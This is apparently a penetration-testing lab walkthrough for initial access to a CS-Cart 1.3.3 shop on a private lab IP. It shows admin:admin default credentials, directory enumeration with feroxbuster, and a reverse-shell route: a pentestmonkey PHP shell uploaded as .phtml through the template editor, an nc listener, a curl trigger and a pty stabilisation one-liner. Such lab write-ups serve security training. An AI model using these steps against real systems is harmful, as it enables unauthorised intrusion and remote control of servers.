http [initial Access]

Looking at page

If we enter passwords like admin and admin. We are are able to login as admin user.

admin
admin

Looking at sub directory.

feroxbuster --url http://192.168.214.39 --filter-status 404

I found two interesting pages.

http://192.168.214.39/admin.php
http://192.168.214.39/install.php

Found that version 1.3.3 is being used of CS cart.

On searching on google, I got the exploit for the CS-CART.

internetshop CS-cart exploit

CS-Cart 1.3.3 - authenticated RCEExploit Database

https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

This is authenticated RCE. This means we will need the username and password for RCE. We have that as admin:admin. Also, Reading the content i found that php and

Visit below link:

http://192.168.214.39/admin.php

click on templete editor

Getting php shell.

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php

mv php-reverse-shell.php shell.php

# Now changed ip and port number.
mousepad shell.php

cat shell.php | grep -ni "changed this"

Now start the listener.

sudo rlwrap nc -lnvp 443

capture the request using burpsuite and change the extention to .phtml

After forwarding the request you will see that file have been uplaod.

Now visit below url to get the shell. Make sure that netcat listener is on.

curl http://192.168.214.39/skins/shell.phtml

Got the shell.

Stabilize it.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousPayday [intermediate]Nextprivilege escalaltion [basic-pass]

Last updated 1 year ago

hashtagLooking at page

hashtagLooking at sub directory.

Looking at page

Looking at sub directory.